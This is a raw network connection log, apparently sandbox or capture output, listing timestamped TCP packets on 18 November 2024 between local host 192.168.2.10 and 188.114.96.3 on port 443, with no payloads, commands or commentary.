Nov 18, 2024 18:11:19.530930996 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.531739950 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.531769991 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.531795979 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:19.531810999 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.531822920 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.531847000 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:19.573561907 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.573661089 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:19.573714018 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.621891975 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:19.942795038 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.942807913 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.942892075 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:19.943475008 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.943483114 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.943523884 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:19.944277048 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.944284916 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.944330931 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:19.945091963 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.945099115 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.945142031 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:19.946365118 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.946387053 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.946409941 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:19.946543932 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.946582079 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:19.946599960 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.946634054 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.140829086 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.140913963 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.141149044 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.141201973 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.141488075 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.141539097 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.257399082 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.257519007 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.268665075 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.268722057 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.268950939 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.269000053 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.269978046 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.270023108 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.376247883 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.376359940 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.408984900 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.409054041 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.409621954 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.409693956 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.410260916 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.410310984 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.411303997 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.411360025 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.526515961 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.526669025 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.527007103 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.527066946 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.527303934 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.527359962 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.527513981 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.527566910 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.528834105 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.528891087 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.643625975 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.643846035 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.644092083 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.644154072 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.644762039 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.644840002 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.645416975 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.645473003 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.645951033 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.646007061 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.759054899 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.759166002 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.759181976 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.759207964 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.759251118 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.759252071 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.760235071 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.760294914 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.760421991 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.760477066 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.761301041 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.761358023 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.876225948 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.876290083 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.876300097 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.876322031 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.876347065 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.876367092 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.876661062 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.876713037 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.877470970 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.877533913 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.878015041 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.878077984 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.878391981 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.878442049 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.994322062 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.994333982 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.994399071 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:21.994554043 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.994554043 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:21.994587898 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.043684006 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:22.109870911 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.109883070 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.110016108 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.110037088 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.110042095 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:22.110085011 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.110107899 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:22.110138893 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:22.111927032 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.111946106 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.111996889 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:22.112009048 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.112025023 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:22.112051010 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:22.228254080 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.228281975 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.228455067 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:22.228506088 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.228568077 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:22.270553112 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.270574093 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.270661116 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:22.270684004 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.270725012 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:22.346091986 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.346117973 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.346260071 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:22.346298933 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.346344948 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:22.460784912 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.460805893 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.460949898 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:22.460995913 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.461042881 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:22.462986946 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.463006020 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.463078976 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:22.463104010 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.463148117 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:22.577929020 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.577951908 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.578016996 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:22.578056097 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.578073025 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:22.578104973 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:22.580245972 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.580264091 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.580333948 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:22.580343008 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.580384970 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:22.695236921 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.695260048 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.695383072 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:22.695422888 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.695473909 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:22.697508097 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.697525024 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.697602034 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:22.697612047 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.697650909 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:22.812180996 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.812200069 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.812298059 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:22.812336922 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.812393904 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:22.814568043 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.814584970 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.814666033 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:22.814676046 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:22.814722061 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.231010914 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.231023073 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.231055021 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.231087923 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.231126070 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.231141090 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.231184959 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.232306004 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.232321978 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.232379913 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.232388973 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.232445002 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.234283924 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.234302044 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.234354973 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.234361887 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.234373093 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.234395027 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.235764980 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.235780954 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.235822916 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.235830069 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.235852957 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.235866070 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.237164974 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.237180948 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.237235069 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.237246037 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.237288952 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.238236904 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.238254070 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.238326073 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.238336086 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.238344908 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.238374949 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.239593983 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.239620924 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.239697933 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.239697933 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.239706039 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.239744902 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.280354977 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.280380964 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.280539036 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.280577898 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.280622005 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.321906090 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.321943045 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.322088957 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.322102070 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.322154045 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.323712111 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.323734045 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.323796034 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.323806047 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.323856115 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.438330889 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.438366890 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.438476086 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.438497066 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.438540936 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.439630032 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.439652920 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.439704895 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.439711094 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.439740896 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.439763069 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.515625000 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.515650034 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.515773058 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.515818119 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.515877962 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.555660009 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.555695057 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.555803061 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.555814028 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.556745052 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.556771994 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.556828022 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.556834936 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.556860924 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.556891918 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.635555983 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.635624886 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.635735989 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.635772943 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.635791063 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.638099909 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.672815084 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.672835112 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.672909975 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.672955990 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.672980070 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.673691034 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.673712015 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.673788071 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.673798084 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.674137115 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.752413988 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.752434969 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.752512932 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.752553940 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.753870010 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.789926052 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.789946079 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.790023088 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.790045023 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.790355921 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.791152000 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.791168928 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.791244984 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.791254044 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.791431904 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.869601011 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.869642973 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.869678974 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.869718075 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.869740009 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.869765997 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.906758070 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.906778097 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.906824112 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.906835079 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.906869888 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.906934977 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.907596111 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.907618046 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.907659054 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.907665968 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.907691002 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.907711983 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.987494946 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.987517118 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.987579107 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:23.987627029 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:23.987700939 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:24.023782969 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.023804903 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.023885012 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:24.023900986 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.023942947 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:24.024595022 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.024611950 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.024661064 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:24.024669886 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.024712086 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:24.088288069 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.088309050 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.088375092 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:24.088404894 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.088696957 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:24.140888929 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.140909910 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.140979052 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:24.141005993 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.141160965 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:24.141801119 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.141824007 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.141869068 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:24.141875982 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:24.141916990 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:24.141938925 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:24.142554045 CET	443	49714	188.114.96.3	192.168.2.10
